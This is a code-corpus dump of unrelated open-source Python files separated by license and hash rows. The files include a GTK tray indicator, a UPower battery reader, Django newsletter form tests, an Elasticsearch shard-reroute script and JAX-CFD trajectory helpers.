handled, result = self._msg_map_.Dispatch(self, hwnd, uMsg, wParam, lParam)
return result
def GetDlgItem(self, nIDDlgItem, windowClass = None):
"""specify window class to get a 'Venster' wrapped control"""
hWnd = GetDlgItem(self.handle, nIDDlgItem)
if hWnd and windowClass:
return windowClass(hWnd = hWnd)
else:
return hWnd
def EndDialog(self, exitCode):
EndDialog(self.handle, exitCode)
def OnOK(self, event):
self.EndDialog(IDOK)
def OnCancel(self, event):
self.EndDialog(IDCANCEL)
def OnInitDialog(self, event):
self.m_handle = event.handle
if self.center: self.CenterWindow()
return 0
_msg_map_ = MSG_MAP([MSG_HANDLER(WM_INITDIALOG, OnInitDialog),
CMD_ID_HANDLER(IDOK, OnOK),
CMD_ID_HANDLER(IDCANCEL, OnCancel)])
| mit | -6,103,811,622,903,813,000 | 31.264192 | 121 | 0.582662 | false |
3dfxsoftware/cbss-addons | mrp_advance/mrp_routing_cost/__openerp__.py | 1 | 2452 | # -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://openerp.com.ve>).
# All Rights Reserved
###############Credits######################################################
# Coded by: [email protected],
# Planified by: Nhomar Hernandez
# Finance by: Helados Gilda, C.A. http://heladosgilda.com.ve
# Audited by: Humberto Arocha [email protected]
#############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
{
"name" : "Calcular de costo teorico MRP" ,
"version" : "0.1" ,
"depends" : ['mrp' ,
] ,
"author" : "Openerp Venezuela" ,
"description" : """
What do this module:
Add cost managment feature to manage of production in mrp.bom Object.
-- Sum all elements on routing
-- Add cost concept for routing
""" ,
"website" : "http://openerp.com.ve" ,
"category" : "Generic Modules/MRP" ,
"init_xml" : [
],
"demo_xml" : [
],
"update_xml" : [
'mrp_routing_view.xml' ,
],
"active": False ,
"installable": True ,
}
| gpl-2.0 | -7,714,735,948,409,343,000 | 50.083333 | 81 | 0.434747 | false |
atareao/cpu-g | src/upower.py | 1 | 7755 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
#
# CPU-G is a program that displays information about your CPU,
# RAM, Motherboard and some general information about your System.
#
# Copyright © 2009 Fotis Tsamis <ftsamis at gmail dot com>.
# Copyright © 2016-2019 Lorenzo Carbonell (aka atareao)
# <lorenzo.carbonell.cerezo at gmail dot com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import dbus
from collections import namedtuple
from functools import partial
from comun import _
def convert(dbus_obj):
"""Converts dbus_obj from dbus type to python type.
:param dbus_obj: dbus object.
:returns: dbus_obj in python type.
"""
_isinstance = partial(isinstance, dbus_obj)
ConvertType = namedtuple('ConvertType', 'pytype dbustypes')
pyint = ConvertType(int, (dbus.Byte, dbus.Int16, dbus.Int32, dbus.Int64,
dbus.UInt16, dbus.UInt32, dbus.UInt64))
pybool = ConvertType(bool, (dbus.Boolean, ))
pyfloat = ConvertType(float, (dbus.Double, ))
pylist = ConvertType(lambda _obj: list(map(convert, dbus_obj)),
(dbus.Array, ))
pytuple = ConvertType(lambda _obj: tuple(map(convert, dbus_obj)),
(dbus.Struct, ))
types_str = (dbus.ObjectPath, dbus.Signature, dbus.String)
pystr = ConvertType(str, types_str)
pydict = ConvertType(
lambda _obj: dict(zip(map(convert, dbus_obj.keys()),
map(convert, dbus_obj.values())
)
),
(dbus.Dictionary, )
)
for conv in (pyint, pybool, pyfloat, pylist, pytuple, pystr, pydict):
if any(map(_isinstance, conv.dbustypes)):
return conv.pytype(dbus_obj)
return dbus_obj
class BatteryDriver():
def __init__(self):
bus = dbus.SystemBus()
bat0_object = bus.get_object(
'org.freedesktop.UPower',
'/org/freedesktop/UPower/devices/battery_BAT0')
self.__statistics = bat0_object.get_dbus_method(
'GetStatistics',
'org.freedesktop.UPower.Device')
self.__history = bat0_object.get_dbus_method(
'GetHistory',
'org.freedesktop.UPower.Device')
self.bat0 = dbus.Interface(bat0_object,
'org.freedesktop.DBus.Properties')
def __get(self, parameter):
return self.bat0.Get('org.freedesktop.UPower.Device', parameter)
def get_native_path(self):
return self.__get('NativePath')
def get_vendor(self):
return self.__get('Vendor')
def get_model(self):
return self.__get('Model')
def get_serial(self):
return self.__get('Serial')
def get_update_time(self):
return self.__get('UpdateTime')
def get_type(self):
ans = self.__get('Type')
if ans == 0:
return _('Unknown')
elif ans == 1:
return _('Line Power')
elif ans == 2:
return _('Battery')
elif ans == 3:
return _('Ups')
elif ans == 4:
return _('Monitor')
elif ans == 5:
return _('Mouse')
elif ans == 6:
return _('Keyboard')
elif ans == 7:
return _('Pda')
elif ans == 8:
return _('Phone')
return _('Unknown')
def get_power_supply(self):
return convert(self.__get('PowerSupply'))
def get_has_history(self):
return convert(self.__get('HasHistory'))
def get_online(self):
return convert(self.__get('Online'))
def get_energy(self):
return convert(self.__get('Energy')) # Wh
def get_energy_empty(self):
return self.__get('EnergyEmpty')
def get_energy_full(self):
return self.__get('EnergyFull')
def get_energy_full_design(self):
return self.__get('EnergyFullDesign')
def get_energy_rate(self):
return self.__get('EnergyRate')
def get_voltage(self): # v
return self.__get('Voltage')
def get_time_to_empty(self): # s
return self.__get('TimeToEmpty')
def get_time_to_full(self): # s
return self.__get('TimeToFull')
def get_percentage(self):
return self.__get('Percentage')
def get_is_present(self):
return convert(self.__get('IsPresent'))
def get_state(self):
ans = self.__get('State')
if ans == 0:
return _('Unknown')
elif ans == 1:
return _('Charging')
elif ans == 2:
return _('Discharging')
elif ans == 3:
return _('Empty')
elif ans == 4:
return _('Fully charged')
elif ans == 5:
return _('Pending charge')
elif ans == 6:
return _('Pending discharge')
return _('Unknown')
def get_capacity(self): # < 75% renew battery
return self.__get('Capacity')
def get_technology(self):
ans = self.__get('Technology')
if ans == 0:
return _('Unknown')
elif ans == 1:
return _('Lithium ion')
elif ans == 2:
return _('Lithium polymer')
elif ans == 3:
return _('Lithium iron phosphate')
elif ans == 4:
return _('Lead acid')
elif ans == 5:
return _('Nickel cadmium')
elif ans == 6:
return _('Nickel metal hydride')
return _('Unknown')
def get_statistics_discharging(self):
return convert(self.__statistics('discharging'))
def get_statistics_charging(self):
return convert(self.__statistics('charging'))
def get_history_rate(self, ndata=1000):
'''
time: The time value in seconds from the gettimeofday() method.
value: the rate in W.
state: The state of the device, for instance charging or discharging.
'''
return convert(self.__history('rate', 0, ndata))
def get_history_charge(self, ndata=1000):
'''
time: The time value in seconds from the gettimeofday() method.
value: the charge in %.
state: The state of the device, for instance charging or discharging.
'''
return convert(self.__history('charge', 0, ndata))
if __name__ == '__main__':
bd = BatteryDriver()
print(bd.get_native_path())
print(bd.get_vendor())
print(bd.get_model())
print(bd.get_serial())
print(bd.get_update_time())
print(bd.get_type())
print(bd.get_power_supply())
print(bd.get_has_history())
print(bd.get_online())
print(bd.get_energy())
print(bd.get_energy_empty())
print(bd.get_energy_full())
print(bd.get_energy_full_design())
print(bd.get_energy_rate())
print(bd.get_voltage())
print(bd.get_time_to_empty())
print(bd.get_time_to_full())
print(bd.get_percentage())
print(bd.get_is_present())
print(bd.get_state())
print(bd.get_capacity())
print(bd.get_technology())
print(bd.get_statistics_discharging())
print(bd.get_statistics_charging())
print(bd.get_history_rate())
print(bd.get_history_charge())
| gpl-3.0 | -4,603,124,261,284,974,600 | 30.644898 | 77 | 0.58042 | false |
maikelwever/gtkuttle | appindicator_replacement.py | 1 | 2820 | #=========================
#
# AppIndicator for GTK
# drop-in replacement
#
# Copyright 2010
# Nathan Osman
#
#=========================
#
# Original source unknown.
# I downloaded this from:
# https://github.com/captn3m0/hackertray
# If you made this gem, please let me know.
#
# They hardcoded the icon file path in here,
# so i'll do the same.
#
#=========================
# We require PyGTK
import gtk
import gobject
# We also need os and sys
import os
# Types
CATEGORY_APPLICATION_STATUS = 0
# Status
STATUS_ACTIVE = 0
STATUS_ATTENTION = 1
# Locations to search for the given icon
def get_icon_filename(icon_name):
# Determine where the icon is
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'icons', 'gtkuttle_{0}.png'.format(icon_name)))
# The main class
class Indicator:
# Constructor
def __init__ (self,unknown,icon,category):
# Store the settings
self.inactive_icon = get_icon_filename("down")
self.active_icon = get_icon_filename("down")
# Create the status icon
self.icon = gtk.StatusIcon()
# Initialize to the default icon
self.icon.set_from_file(self.inactive_icon)
# Set the rest of the vars
self.menu = None # We have no menu yet
def set_menu(self,menu):
# Save a copy of the menu
self.menu = menu
# Now attach the icon's signal
# to the menu so that it becomes displayed
# whenever the user clicks it
self.icon.connect("activate", self.show_menu)
def set_status(self, status):
# Status defines whether the active or inactive
# icon should be displayed.
if status == STATUS_ACTIVE:
self.icon.set_from_file(self.inactive_icon)
else:
self.icon.set_from_file(self.active_icon)
def set_label(self, label):
self.icon.set_title(label)
return
def set_icon(self, icon):
# Set the new icon
self.icon.set_from_file(get_icon_filename(icon))
def set_attention_icon(self, icon):
# Set the icon filename as the attention icon
self.active_icon = get_icon_filename(icon)
def show_menu(self, widget):
# Show the menu
self.menu.popup(None,None,None,0,0)
# Get the location and size of the window
mouse_rect = self.menu.get_window().get_frame_extents()
self.x = mouse_rect.x
self.y = mouse_rect.y
self.right = self.x + mouse_rect.width
self.bottom = self.y + mouse_rect.height
# Set a timer to poll the menu
self.timer = gobject.timeout_add(100, self.check_mouse)
def check_mouse(self):
if not self.menu.get_window().is_visible():
return
# Now check the global mouse coords
root = self.menu.get_screen().get_root_window()
x,y,z = root.get_pointer()
if x < self.x or x > self.right or y < self.y or y > self.bottom:
self.hide_menu()
else:
return True
def hide_menu(self):
self.menu.popdown()
| gpl-3.0 | 7,842,098,730,820,717,000 | 21.204724 | 111 | 0.658511 | false |
JohnReid/biopsy | Python/biopsy/gapped_pssms/__init__.py | 1 | 3770 | #
# Copyright John Reid 2006
#
import numpy, numpy.random, scipy.special, math
from _maths import *
from _generate import *
from _generate_2 import *
from _variational import *
from gapped_pssms import *
from weblogo import *
#
# Try to import C++ part of module if installed.
#
try:
from _gapped_pssms import *
#
# The c implementation does not hold the data as numpy arrays
# so provide some functions to create numpy arrays from the data
#
def _gapped_pssm_alpha_array( model ):
"""Beta prior parameters for gamma: the likelihood of a gap"""
return numpy.array(
[
model.alpha( i )
for i in xrange( 2 )
],
dtype = numpy.float64
)
VariationalModel_C.alpha_array = _gapped_pssm_alpha_array
def _gapped_pssm_varphi_array( model ):
"Dirichlet prior parameters for background distribution"
return numpy.array(
[
model.varphi( i )
for i in xrange( 4 )
],
dtype = numpy.float64
)
VariationalModel_C.varphi_array = _gapped_pssm_varphi_array
def _gapped_pssm_phi_array( model ):
"Dirichlet prior parameters for pssm distribution"
return numpy.array(
[
model.phi( i )
for i in xrange( 4 )
],
dtype = numpy.float64
)
VariationalModel_C.phi_array = _gapped_pssm_phi_array
def _gapped_pssm_lambda_array( model ):
"Variational parameter for gamma"
return numpy.array(
[
model.lambda_( i )
for i in xrange( 2 )
],
dtype = numpy.float64
)
VariationalModel_C.lambda_array = _gapped_pssm_lambda_array
def _gapped_pssm_eta_array( model ):
"Variational parameter for location of the gap"
return numpy.array(
[
model.eta( i )
for i in xrange( model.K - 1 )
],
dtype = numpy.float64
)
VariationalModel_C.eta_array = _gapped_pssm_eta_array
def _gapped_pssm_mu_array( model ):
"Variational parameter for g: has_gap variable"
return numpy.array(
[
model.mu( i )
for i in xrange( model.N )
],
dtype = numpy.float64
)
VariationalModel_C.mu_array = _gapped_pssm_mu_array
def _gapped_pssm_omega_array( model ):
"Variational parameters for background and pss distributions"
return numpy.array(
[
[
model.omega( r, x )
for x in xrange( 4 )
]
for r in xrange( model.K+1 )
],
dtype = numpy.float64
)
VariationalModel_C.omega_array = _gapped_pssm_omega_array
def _gapped_pssm_nu_sequence( model ):
"Variational parameters for start positions of sites"
return [
numpy.array(
[
model.nu( n, i )
for i in xrange( 2 * (model.sequence_length( n ) - model.K) )
],
dtype = numpy.float64
)
for n in xrange( model.N )
]
VariationalModel_C.nu_sequence = _gapped_pssm_nu_sequence
except ImportError:
import warnings
warnings.warn('Could not import C++ gapped PSSM module')
| mit | -4,675,622,362,759,512,000 | 30.416667 | 93 | 0.491777 | false |
jpurplefox/PokeMovesetEvaluator | moves.py | 1 | 1267 | class Move():
def __init__(self, name, power, cooldown, energy):
self.name = name
self.power = power
self.cooldown = cooldown
self.energy = energy
def get_total_power(self):
return self.get_atacks_count() * self.power
def get_total_cooldown(self):
return self.get_atacks_count() * self.cooldown
def __str__(self):
return self.name
class FastMove(Move):
def get_atacks_count(self):
count = 100 / self.energy
rest = 100 % self.energy
if rest:
count += 1
return count
class ChargeMove(Move):
def get_atacks_count(self):
return 100 / self.energy
BUBBLE = FastMove('Bubble', 31.25, 2.3, 15)
MUD_SHOT = FastMove('Mud Shot', 6, 0.55, 7)
WATER_GUN = FastMove('Water Gun', 7.5, 0.5, 7)
TACKLE = FastMove('Tackle', 12, 1.1, 7)
HYDRO_PUMP = ChargeMove('Hydro Pump', 112.5, 3.8, 100)
ICE_PUNCH = ChargeMove('Ice Punch', 45, 3.5, 33)
SUBMISSION = ChargeMove('Submission', 37.5, 2.1, 33)
AQUA_TAIL = ChargeMove('Aqua Tail', 56.25, 2.35, 50)
WATER_PULSE = ChargeMove('Water Pulse', 43.75, 3.3, 25)
POWER_GEM = ChargeMove('Power Gem', 40, 2.9, 33)
PSYCHIC = ChargeMove('Psychic', 68.75, 2.8, 50)
| gpl-3.0 | -593,390,082,307,868,000 | 30.675 | 55 | 0.590371 | false |
pfpsim/pfpdb | pfpdb/__main__.py | 1 | 1074 | # -*- coding: utf-8 -*-
#
# pfpdb: Debugger for models built with the PFPSim Framework
#
# Copyright (C) 2016 Concordia Univ., Montreal
# Samar Abdi
# Umair Aftab
# Gordon Bailey
# Faras Dewal
# Shafigh Parsazad
# Eric Tremblay
#
# Copyright (C) 2016 Ericsson
# Bochra Boughzala
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
"""pfpdb.__main__"""
from .pfpdb import main
main() | gpl-2.0 | -7,849,093,004,204,732,000 | 27.289474 | 67 | 0.72067 | false |
elin-moco/bedrock | bedrock/newsletter/tests/test_forms.py | 1 | 10098 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import mock
from bedrock.mozorg.tests import TestCase
from ..forms import (BooleanRadioRenderer, ManageSubscriptionsForm,
NewsletterFooterForm, NewsletterForm,
UnlabeledTableCellRadios
)
from .test_views import newsletters
class TestRenderers(TestCase):
def test_radios(self):
"""Test radio button renderer"""
choices = ((123, "NAME_A"), (245, "NAME_2"))
renderer = UnlabeledTableCellRadios("name", "value", {}, choices)
output = str(renderer)
# The choices should not be labeled
self.assertNotIn("NAME_A", output)
self.assertNotIn("NAME_2", output)
# But the values should be in there
self.assertIn('value="123"', output)
self.assertIn('value="245"', output)
# Should be table cells
self.assertTrue(output.startswith("<td>"))
self.assertTrue(output.endswith("</td>"))
self.assertIn("</td><td>", output)
def test_boolean_true(self):
"""renderer starts with True selected if value given is True"""
choices = ((False, "False"), (True, "True"))
renderer = BooleanRadioRenderer("name", value="True", attrs={},
choices=choices)
output = str(renderer)
# The True choice should be checked
self.assertIn('checked=checked value="True"', output)
def test_boolean_false(self):
"""renderer starts with False selected if value given is False"""
choices = ((False, "False"), (True, "True"))
renderer = BooleanRadioRenderer("name", value="False", attrs={},
choices=choices)
output = str(renderer)
# The False choice should be checked
self.assertIn('checked=checked value="False"', output)
class TestManageSubscriptionsForm(TestCase):
def test_locale(self):
"""Get initial lang, country from the right places"""
# Get initial lang and country from 'initial' if provided there,
# else from the locale passed in
# First, not passed in
locale = "en-US"
form = ManageSubscriptionsForm(locale=locale, initial={})
self.assertEqual('en', form.initial['lang'])
self.assertEqual('us', form.initial['country'])
# now, test with them passed in.
form = ManageSubscriptionsForm(locale=locale,
initial={
'lang': 'pt',
'country': 'br',
})
self.assertEqual('pt', form.initial['lang'])
self.assertEqual('br', form.initial['country'])
@mock.patch('bedrock.newsletter.forms.get_lang_choices')
def test_long_language(self, langs_mock):
"""Fuzzy match their language preference"""
# Suppose their selected language in ET is a long form ("es-ES")
# while we only have the short forms ("es") in our list of
# valid languages. Or vice-versa. Find the match to the one
# in our list and use that, not the lang from ET.
locale = 'en-US'
langs_mock.return_value = [['en', 'English'], ['es', 'Spanish']]
form = ManageSubscriptionsForm(locale=locale,
initial={
'lang': 'es-ES',
'country': 'es',
})
# Initial value is 'es'
self.assertEqual('es', form.initial['lang'])
def test_bad_language(self):
"""Handle their language preference if it's not valid"""
# Suppose their selected language in ET is one we don't recognize
# at all. Use the language from their locale instead.
locale = "pt-BR"
form = ManageSubscriptionsForm(locale=locale,
initial={
'lang': 'zz',
'country': 'es',
})
self.assertEqual('pt', form.initial['lang'])
class TestNewsletterForm(TestCase):
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_form(self, get_newsletters):
"""test NewsletterForm"""
# not much to test, but at least construct one
get_newsletters.return_value = newsletters
title = "Newsletter title"
newsletter = 'newsletter-a'
initial = {
'title': title,
'newsletter': newsletter,
'subscribed': True,
}
form = NewsletterForm(initial=initial)
rendered = str(form)
self.assertIn(newsletter, rendered)
self.assertIn(title, rendered)
# And validate one
form = NewsletterForm(data=initial)
self.assertTrue(form.is_valid())
self.assertEqual(title, form.cleaned_data['title'])
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_invalid_newsletter(self, get_newsletters):
"""Should raise a validation error for an invalid newsletter."""
get_newsletters.return_value = newsletters
data = {
'newsletter': 'mozilla-and-you',
'email': '[email protected]',
'lang': 'en',
'privacy': 'Y',
'fmt': 'H',
}
form = NewsletterFooterForm('en-US', data=data)
self.assertTrue(form.is_valid())
data['newsletter'] = 'does-not-exist'
form = NewsletterFooterForm('en-US', data=data)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['newsletter'][0], 'does-not-exist is not '
'a valid newsletter')
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_multiple_newsletters(self, get_newsletters):
"""Should allow to subscribe to multiple newsletters at a time."""
get_newsletters.return_value = newsletters
data = {
'newsletter': 'mozilla-and-you,beta',
'email': '[email protected]',
'lang': 'en',
'privacy': 'Y',
'fmt': 'H',
}
form = NewsletterFooterForm('en-US', data=data.copy())
self.assertTrue(form.is_valid())
# whitespace shouldn't matter
data['newsletter'] = 'mozilla-and-you , beta '
form = NewsletterFooterForm('en-US', data=data.copy())
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['newsletter'],
'mozilla-and-you,beta')
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_multiple_newsletters_invalid(self, get_newsletters):
"""Should throw error if any newsletter is invalid."""
get_newsletters.return_value = newsletters
data = {
'newsletter': 'mozilla-and-you,beta-DUDE',
'email': '[email protected]',
'privacy': 'Y',
'fmt': 'H',
}
form = NewsletterFooterForm('en-US', data=data.copy())
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['newsletter'][0], 'beta-DUDE is not '
'a valid newsletter')
class TestNewsletterFooterForm(TestCase):
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_form(self, get_newsletters):
"""Form works normally"""
get_newsletters.return_value = newsletters
newsletter = u"mozilla-and-you"
data = {
'email': '[email protected]',
'lang': 'fr',
'newsletter': newsletter,
'privacy': True,
'fmt': 'H',
}
form = NewsletterFooterForm(locale='en-US', data=data)
self.assertTrue(form.is_valid(), form.errors)
cleaned_data = form.cleaned_data
self.assertEqual(data['fmt'], cleaned_data['fmt'])
self.assertEqual(data['lang'], cleaned_data['lang'])
def test_country_default(self):
"""country defaults based on the locale"""
form = NewsletterFooterForm(locale='fr')
self.assertEqual('fr', form.fields['country'].initial)
form = NewsletterFooterForm(locale='pt-BR')
self.assertEqual('br', form.fields['country'].initial)
def test_lang_default(self):
"""lang defaults based on the locale"""
form = NewsletterFooterForm(locale='pt-BR')
self.assertEqual('pt', form.fields['lang'].initial)
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_lang_not_required(self, get_newsletters):
"""lang not required since field not always displayed"""
get_newsletters.return_value = newsletters
newsletter = u"mozilla-and-you"
data = {
'email': '[email protected]',
'newsletter': newsletter,
'privacy': True,
'fmt': 'H',
}
form = NewsletterFooterForm(locale='en-US', data=data)
self.assertTrue(form.is_valid(), form.errors)
# Form returns '' for lang, so we don't accidentally change the user's
# preferred language thinking they entered something here that they
# didn't.
self.assertEqual(u'', form.cleaned_data['lang'])
@mock.patch('bedrock.newsletter.utils.get_newsletters')
def test_privacy_required(self, get_newsletters):
"""they have to check the privacy box"""
get_newsletters.return_value = newsletters
newsletter = u"mozilla-and-you"
data = {
'email': '[email protected]',
'newsletter': newsletter,
'privacy': False,
'fmt': 'H',
}
form = NewsletterFooterForm(locale='en-US', data=data)
self.assertIn('privacy', form.errors)
| mpl-2.0 | -663,596,663,655,858,000 | 40.555556 | 79 | 0.56734 | false |
mdunker/usergrid | utils/usergrid-util-python/es_tools/command_sender.py | 2 | 1615 | # */
# * Licensed to the Apache Software Foundation (ASF) under one
# * or more contributor license agreements. See the NOTICE file
# * distributed with this work for additional information
# * regarding copyright ownership. The ASF licenses this file
# * to you under the Apache License, Version 2.0 (the
# * "License"); you may not use this file except in compliance
# * with the License. You may obtain a copy of the License at
# *
# * http://www.apache.org/licenses/LICENSE-2.0
# *
# * Unless required by applicable law or agreed to in writing,
# * software distributed under the License is distributed on an
# * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# * KIND, either express or implied. See the License for the
# * specific language governing permissions and limitations
# * under the License.
# */
import json
import requests
__author__ = '[email protected]'
# Simple utility to send commands, useful to not have to recall the proper format
data = {
"commands": [
{
"move": {
"index": "usergrid__APPID__application_target_final",
"shard": 14,
"from_node": "elasticsearch018",
"to_node": "elasticsearch021"
}
},
{
"move": {
"index": "usergrid__APPID__application_target_final",
"shard": 12,
"from_node": "elasticsearch018",
"to_node": "elasticsearch009"
}
},
]
}
r = requests.post('http://localhost:9211/_cluster/reroute', data=json.dumps(data))
print r.text | apache-2.0 | 799,847,844,487,885,400 | 30.076923 | 82 | 0.616099 | false |
dls-controls/scanpointgenerator | scanpointgenerator/generators/zipgenerator.py | 1 | 1984 | from annotypes import Anno, deserialize_object, Array, Sequence, Union
from scanpointgenerator.core import Generator, AAlternate
with Anno("List of Generators to zip"):
AGenerators = Array[Generator]
UGenerators = Union[AGenerators, Sequence[Generator], Generator]
@Generator.register_subclass(
"scanpointgenerator:generator/ZipGenerator:1.0")
class ZipGenerator(Generator):
""" Zip generators together, combining all generators into one """
def __init__(self, generators, alternate=False):
# type: (UGenerators, AAlternate) -> None
self.generators = AGenerators([deserialize_object(g, Generator)
for g in generators])
assert len(self.generators), "At least one generator needed"
units = []
axes = []
size = self.generators[0].size
for generator in self.generators:
assert generator.axes not in axes, "You cannot zip generators " \
"on the same axes"
assert generator.size == size, "You cannot zip generators " \
"of different sizes"
assert not generator.alternate, \
"Alternate should not be set on the component generators of a" \
"zip generator. Set it on the top level ZipGenerator only."
axes += generator.axes
units += generator.units
super(ZipGenerator, self).__init__(axes=axes,
size=size,
units=units,
alternate=alternate)
def prepare_arrays(self, index_array):
# The ZipGenerator gets its positions from its sub-generators
zipped_arrays = {}
for generator in self.generators:
arrays = generator.prepare_arrays(index_array)
zipped_arrays.update(arrays)
return zipped_arrays
| apache-2.0 | 8,799,549,726,361,614,000 | 38.68 | 80 | 0.580141 | false |
alurin/alurinium-image-processing | alurinium/image/image.py | 1 | 1292 | from urllib.parse import urljoin
from django.conf import settings
from PIL import Image
import os
class ImageDescriptor(object):
name = None
url = None
fullname = None
width = None
height = None
@classmethod
def create_from_file(cls, filename, parse=True):
image = cls()
image.name = filename
image.url = urljoin(settings.MEDIA_URL, 'thumbs/' + filename)
image.fullname = os.path.join(settings.MEDIA_ROOT, 'thumbs', filename)
# get image size
# TODO: Add exception handling
if parse:
image.update()
# return result image
return image
@classmethod
def create_from_image(cls, fullname, result_image):
image = cls()
image.fullname = fullname
image.name = os.path.basename(fullname)
image.url = urljoin(settings.MEDIA_URL, 'thumbs/' + image.name)
# get image size
# TODO: Add exception handling
image.update(result_image)
# return result image
return image
def update(self, image=None):
if not image:
image = Image.open(self.fullname)
image.width, image.height = image.size
def __str__(self):
return "%s: %sx%s" % (self.url, self.width, self.height) | mit | 797,458,417,655,209,200 | 24.86 | 78 | 0.607585 | false |
uw-it-aca/myuw | myuw/test/api/dept_calendar.py | 1 | 2200 | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from myuw.test.api import require_url, MyuwApiTest
import json
@require_url('myuw_deptcal_events')
class TestDeptCalAPI(MyuwApiTest):
'''Test Department Calendar API'''
def get_deptcal(self):
rev = 'myuw_deptcal_events'
return self.get_response_by_reverse(rev)
def test_javerage_cal_apr15(self):
'''Test javerage's deptcal on default date'''
self.set_user('javerage')
self.set_date('2013-4-15')
response = self.get_deptcal()
data = json.loads(response.content)
self.assertEqual(len(data['future_active_cals']), 0)
self.assertEqual(len(data['active_cals']), 2)
events = data['events']
self.assertEqual(len(events), 7)
sorted_events = sorted(events, key=lambda x: x.get('summary'))
event_two = sorted_events[2]
self.assertEqual(event_two['event_location'], u'')
self.assertEqual(
event_two['summary'],
'Organic Chemistry Seminar: Prof. Matthew Becker3')
self.assertEqual(
event_two['event_url'],
'http://art.washington.edu/calendar/?trumbaEmbed=eventid%3D11074'
'21160%26view%3Devent'
)
self.assertTrue(event_two['is_all_day'])
self.assertEqual(event_two['start'], '2013-04-18T00:00:00-07:53')
self.assertEqual(event_two['end'], '2013-04-18T00:00:00-07:53')
def test_javerage_cal_feb15(self):
'''Test javerage's deptcal on date with no events'''
self.set_user('javerage')
self.set_date('2013-2-15')
response = self.get_deptcal()
data = json.loads(response.content)
self.assertEqual(
data,
{'future_active_cals': [], 'active_cals': [], 'events': []})
def test_nonexistant_user(self):
'''Test user with no deptcals'''
self.set_user('none')
self.set_date('2013-4-15')
response = self.get_deptcal()
data = json.loads(response.content)
self.assertEqual(
data,
{'future_active_cals': [], 'active_cals': [], 'events': []})
| apache-2.0 | -2,152,130,454,297,783,600 | 31.835821 | 77 | 0.597727 | false |
google/jax-cfd | jax_cfd/ml/model_utils.py | 1 | 3026 | """Helper methods for constructing trajectory functions in model_builder.py."""
import functools
from jax_cfd.base import array_utils
def with_preprocessing(fn, preprocess_fn):
"""Generates a function that computes `fn` on `preprocess_fn(x)`."""
@functools.wraps(fn)
def apply_fn(x, *args, **kwargs):
return fn(preprocess_fn(x), *args, **kwargs)
return apply_fn
def with_post_processing(fn, post_process_fn):
"""Generates a function that applies `post_process_fn` to outputs of `fn`."""
@functools.wraps(fn)
def apply_fn(*args, **kwargs):
return post_process_fn(*fn(*args, **kwargs))
return apply_fn
def with_split_input(fn, split_index, time_axis=0):
"""Decorates `fn` to be evaluated on first `split_index` time slices.
The returned function is a generalization to pytrees of the function:
`fn(x[:split_index], *args, **kwargs)`
Args:
fn: function to be transformed.
split_index: number of input elements along the time axis to use.
time_axis: axis corresponding to time dimension in `x` to decorated `fn`.
Returns:
decorated `fn` that is evaluated on only `split_index` first time slices of
provided inputs.
"""
@functools.wraps(fn)
def apply_fn(x, *args, **kwargs):
init, _ = array_utils.split_along_axis(x, split_index, axis=time_axis)
return fn(init, *args, **kwargs)
return apply_fn
def with_input_included(trajectory_fn, time_axis=0):
"""Returns a `trajectory_fn` that concatenates inputs `x` to trajectory."""
@functools.wraps(trajectory_fn)
def _trajectory(x, *args, **kwargs):
final, unroll = trajectory_fn(x, *args, **kwargs)
return final, array_utils.concat_along_axis([x, unroll], time_axis)
return _trajectory
def decoded_trajectory_with_inputs(model, num_init_frames):
"""Returns trajectory_fn operating on decoded data.
The returned function uses `num_init_frames` of the physics space trajectory
provided as an input to initialize the model state, unrolls the trajectory of
specified length that is decoded to the physics space using `model.decode_fn`.
Args:
model: model of a dynamical system used to obtain the trajectory.
num_init_frames: number of time frames used from the physics trajectory to
initialize the model state.
Returns:
Trajectory function that operates on physics space trajectories and returns
unrolls in physics space.
"""
def _trajectory_fn(x, steps, repeated_length=1):
trajectory_fn = functools.partial(
model.trajectory, post_process_fn=model.decode)
# add preprocessing to convert data to model state.
trajectory_fn = with_preprocessing(trajectory_fn, model.encode)
# concatenate input trajectory to output trajectory for easier comparison.
trajectory_fn = with_input_included(trajectory_fn)
# make trajectories operate on full examples by splitting the init.
trajectory_fn = with_split_input(trajectory_fn, num_init_frames)
